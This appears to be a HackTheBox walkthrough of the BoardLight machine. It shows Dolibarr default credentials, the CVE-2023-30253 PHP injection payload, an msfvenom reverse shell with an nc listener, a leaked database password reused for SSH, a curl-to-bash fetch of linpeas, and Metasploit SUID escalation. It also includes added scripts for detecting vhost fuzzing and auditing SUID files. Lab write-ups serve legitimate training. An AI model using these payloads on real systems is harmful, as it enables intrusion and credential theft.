HTB: BoardLight Writeup


Machine Information

Attribute | Details
Name | BoardLight
OS | Linux
Difficulty | Easy
Points | 20
Release Date | 2023
IP Address | 10.10.11.206
Author | joshuastrike

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

BoardLight is an Easy-difficulty Linux machine running Dolibarr ERP/CRM 17.0.0. The attack leverages CVE-2023-30253, an authenticated PHP code injection vulnerability in Dolibarr, combined with credential reuse and Enlightenment SUID binary exploitation for privilege escalation.

TL;DR: Subdomain enumeration → Dolibarr discovery → Default credentials → PHP code injection → Reverse shell → Credential reuse → SSH access → Enlightenment exploit → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.11.206

Results:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41

Subdomain Enumeration

Add the machine to /etc/hosts:

echo "10.10.11.206 board.htb boardlight.htb" >> /etc/hosts

Use ffuf to discover subdomains (filtering by response size to exclude non-existent subdomains):

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb" -H "Host: FUZZ.board.htb" -fs 187

Results:

crm [Status: 200, Size: 6990, Words: 2001, Lines: 109]
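On the server side, Host-header fuzzing like this shows up as one client requesting many distinct virtual hosts in a short window. The following is an added example, not part of the original writeup: it assumes an Apache LogFormat that records the Host header as the first field, and the log lines, client addresses and function names are constructed for illustration.

```bash
#!/bin/sh
# Added example: flag clients that send many distinct Host headers, the
# server-side footprint of virtual-host fuzzing.
# Assumption (not from the writeup): the access log uses
#   LogFormat "%{Host}i %h %l %u %t \"%r\" %>s %B"
# so field 1 is the Host header and field 2 the client address.

# detect_vhost_fuzz LOGFILE [THRESHOLD]
# Prints "client distinct_hosts requests" for every client whose number of
# distinct Host values is at least THRESHOLD (default 20).
detect_vhost_fuzz() {
  awk -v t="${2:-20}" '
    {
      host = tolower($1); sub(/:[0-9]+$/, "", host)   # drop any :port suffix
      ip = $2
      reqs[ip]++
      if (!((ip, host) in seen)) { seen[ip, host] = 1; hosts[ip]++ }
    }
    END {
      for (ip in hosts)
        if (hosts[ip] >= t) print ip, hosts[ip], reqs[ip]
    }' "$1" | sort
}

# Constructed sample log: one client cycling through Host values and one
# ordinary visitor. Sizes 187 and 6990 mirror the ffuf output above.
make_sample_log() {
  : > "$1"
  for name in www mail dev test admin; do
    printf '%s.board.htb 10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 187\n' \
      "$name" >> "$1"
  done
  printf 'crm.board.htb 10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 6990\n' >> "$1"
  for i in 1 2 3; do
    printf 'board.htb 192.0.2.10 - - [01/Jan/2024:10:05:0%s +0000] "GET / HTTP/1.1" 200 15949\n' \
      "$i" >> "$1"
  done
}

# Demo: threshold lowered to 5 because the sample is tiny.
sample=$(mktemp)
make_sample_log "$sample"
detect_vhost_fuzz "$sample" 5    # -> 10.10.14.5 6 6
rm -f "$sample"
```

Note that Apache's %v logs the name of the virtual host that served the request, not the header the client sent, so the default combined and vhost_combined formats do not expose this signal.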

Service Enumeration

Discovered: crm.board.htb runs Dolibarr ERP/CRM 17.0.0

echo "10.10.11.206 crm.board.htb" >> /etc/hosts
curl http://crm.board.htb

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-30253 — Dolibarr 17.0.0 Authenticated PHP Code Injection vulnerability in website module.
  • Enlightenment SUID Privilege Escalation — Local privilege escalation via Enlightenment binary.

Initial Foothold

Step 1: Access Dolibarr with Default Credentials

Navigate to http://crm.board.htb and log in with default credentials:

Username: admin
Password: admin

This grants access to the Dolibarr administration panel.

Step 2: Exploit CVE-2023-30253 PHP Code Injection

Dolibarr 17.0.0 allows authenticated users to inject PHP code when creating website pages. Navigate to:

Websites > Pages

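Create a new page and inject PHP code in the content field. The opening tag is deliberately written in uppercase: CVE-2023-30253 is a case-handling flaw in which Dolibarr before 17.0.1 lets an authenticated user get injected code executed by writing <?PHP in place of <?php:

<?PHP echo system("whoami"); ?>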

Step 3: Generate and Deliver Reverse Shell

Use msfvenom to create a PHP reverse shell payload:

msfvenom -p php/reverse_php LHOST=10.10.14.x LPORT=4444 -f raw > shell.php

Inject the payload into a Dolibarr website page. Set up a listener:

nc -nlvp 4444

Execute the payload through the web interface to obtain a reverse shell as www-data.

Step 4: Extract Database Credentials

Once inside the shell, locate and read the Dolibarr configuration file:

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

Discovered Credentials:

Database User: dolibarrowner
Database Password: serverfun2$2023!!

User Compromise

Credential Discovery and Reuse

The database credentials discovered earlier (serverfun2$2023!!) are reused by the system user larissa. Attempt SSH access:

ssh larissa@board.htb

Password: serverfun2$2023!!

This grants authenticated SSH access as the larissa user.

User Flag

Once logged in via SSH:

cat ~/user.txt

🚩 User Flag: [Flag captured from /home/larissa/user.txt]


Privilege Escalation

Enumeration

Run standard enumeration commands to identify potential privilege escalation vectors:

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Use automated tools like linpeas.sh to identify exploitable conditions:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

Key Findings:

  • Enlightenment SUID binary present
  • Sudo version: 1.8.31
  • Kernel: Linux 5.x (potentially vulnerable to DirtyPipe - CVE-2022-0847)
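The same find predicate is what a defender would run on a schedule to catch an unexpected set-uid binary before an attacker does. The following is an added example, not part of the original writeup: it compares set-uid files against an approved baseline, and the allowlist file, function names and demo paths are constructed for illustration.

```bash
#!/bin/sh
# Added example: report set-uid files that are not on an approved baseline.
# The allowlist file and the demo paths are constructed for illustration.

# suid_audit ROOT ALLOWLIST
# Prints every set-uid regular file under ROOT whose absolute path is not
# listed in ALLOWLIST (one path per line).
# Returns 0 if all are approved, 1 if any are unexpected, 2 on a bad allowlist.
suid_audit() {
  if [ ! -r "$2" ]; then
    echo "suid_audit: cannot read allowlist $2" >&2
    return 2
  fi
  # Same predicate as the find command above; -xdev stays on one filesystem.
  unexpected=$(find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
               grep -Fxv -f "$2" || true)
  [ -z "$unexpected" ] && return 0
  printf '%s\n' "$unexpected"
  return 1
}

# Constructed tree: one approved set-uid file and one that nobody approved.
make_demo_tree() {
  mkdir -p "$1/usr/bin" "$1/opt/example"
  : > "$1/usr/bin/passwd"
  : > "$1/opt/example/helper"
  : > "$1/usr/bin/ls"                       # ordinary file, no set-uid bit
  chmod 4755 "$1/usr/bin/passwd" "$1/opt/example/helper"
  chmod 0755 "$1/usr/bin/ls"
  printf '%s\n' "$1/usr/bin/passwd" > "$1/allow.txt"
}

# Demo on the constructed tree: prints the unapproved helper path.
demo=$(mktemp -d)
make_demo_tree "$demo"
suid_audit "$demo" "$demo/allow.txt" || echo "review the paths listed above"
rm -rf "$demo"
```

A missing allowlist returns 2 instead of silently reporting a clean system, so a broken baseline cannot mask a finding.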

Exploitation (Root/Administrator)

Use Metasploit to exploit the Enlightenment SUID binary vulnerability:

msfconsole
search enlightenment
use exploit/linux/local/ubuntu_enlightenment_mount_priv_esc
set LHOST 10.10.14.x
set LPORT 5555
set SESSION [session_id]
run

Alternatively, download and execute the standalone exploit. This grants root-level access.

Root Flag

Once root access is obtained:

cat /root/root.txt

🚩 Root Flag: [Flag captured from /root/root.txt]


Attack Chain Summary

graph TD
A["Nmap Scan<br/>Discover ports 22, 80"] --> B["Subdomain Enumeration<br/>ffuf discovers crm.board.htb"]
B --> C["Dolibarr 17.0.0 Identified<br/>Running on crm.board.htb"]
C --> D["Default Credentials<br/>admin:admin"]
D --> E["CVE-2023-30253 Exploitation<br/>PHP Code Injection in Pages"]
E --> F["Reverse Shell<br/>www-data Access"]
F --> G["Config File Extraction<br/>Database Credentials Found"]
G --> H["Credential Reuse<br/>larissa:serverfun2$2023!!"]
H --> I["SSH Access<br/>larissa User Shell"]
I --> J["Enlightenment Exploit<br/>SUID Binary Vulnerability"]
J --> K["Root Access<br/>ubuntu_enlightenment_mount_priv_esc"]

Tools Used

Tool | Purpose
nmap | Port scanning and service fingerprinting
ffuf | Subdomain enumeration and web fuzzing
feroxbuster | Directory brute-forcing
msfvenom | Reverse shell payload generation
msfconsole | Metasploit exploitation framework
mysql | Database interaction and credential verification
linpeas.sh | Automated privilege escalation enumeration
searchsploit | Local exploit searching
ssh | Secure shell access and authentication
nc | Reverse shell listener setup
curl | Web requests and configuration retrieval
python3 | Scripting and exploit execution
gobuster | Alternative directory enumeration

Vulnerability Reference

# | Vulnerability | Component | Severity | Impact
1 | CVE-2023-30253 | Dolibarr 17.0.0 | High | Authenticated PHP Code Injection in website module
2 | Default Credentials | Dolibarr Application | High | Unrestricted admin access with admin:admin
3 | Credential Reuse | System Configuration | High | Database password reused for SSH user
4 | Enlightenment SUID Exploit | Linux Binary | High | Local privilege escalation to root
5 | CVE-2022-0847 (DirtyPipe) | Linux Kernel | Critical | Alternative kernel-level privilege escalation

Key Learnings

  • Subdomain enumeration is essential: Virtual hosts and subdomains often host different applications with their own vulnerabilities (Dolibarr was on crm.board.htb, not the main domain).
  • Default credentials remain a critical risk: Many enterprise applications ship with default credentials that are never changed in development/staging environments.
  • Credential reuse is a common security failure: Database passwords being reused for system user accounts enables lateral movement from web application to system access.
  • Configuration files are gold mines: Application config files (/conf/conf.php, .env files, etc.) often contain sensitive credentials that should never be readable by web processes.
  • SUID binaries can escalate privileges: Lesser-known SUID binaries (like Enlightenment) can be exploited for privilege escalation; automated tools like linpeas help identify these.
  • Defense in depth matters: Even with compromised web services, proper privilege separation and credential isolation could have prevented full system compromise.

Author

joshuastrike (Original Machine Creator)


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. This writeup documents the intended attack chain and vulnerabilities present in the BoardLight machine.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #Dolibarr #CVE-2023-30253 #PHP-CodeInjection #CredentialReuse #Enlightenment